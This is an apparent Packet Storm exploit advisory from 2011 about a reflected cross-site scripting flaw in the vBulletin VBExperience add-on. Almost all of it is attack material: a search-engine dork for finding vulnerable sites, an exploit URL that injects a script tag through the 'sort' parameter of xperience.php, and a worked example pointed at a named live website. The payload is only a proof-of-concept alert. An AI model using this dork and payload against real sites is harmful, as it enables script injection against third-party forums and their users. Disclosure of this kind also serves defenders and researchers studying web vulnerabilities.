vBulletin VBExperience Cross Site Scripting

2011-06-17T00:00:00
ID PACKETSTORM:102370
Type packetstorm
Reporter Mr.ThieF
Modified 2011-06-17T00:00:00

Description

                                        
                                            `  
++++++++++++++++++++++++++++++++++++++++  
[~] Author : Mr.ThieF <~  
  
[~] Contact : Mr.ThieF@yahoo.com <~  
  
[~] DorK : inurl:xperience.php  
  
[~] Software Link : http://www.vbulletin.org/forum/showthread.php?t=245023  
  
[~] Version : 4.x.x - 3.x.x  
  
[~] Exploit :  
  
http://[site]/[path]/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script>  
  
[~] Example :   
  
http://www.vbaddict.net/xperience.php?go=ranking&order=asc&sort="><script>alert(1);</script>  
  
++++++++++++++++++++++++++++++++++++++++  
  
  
  
  
`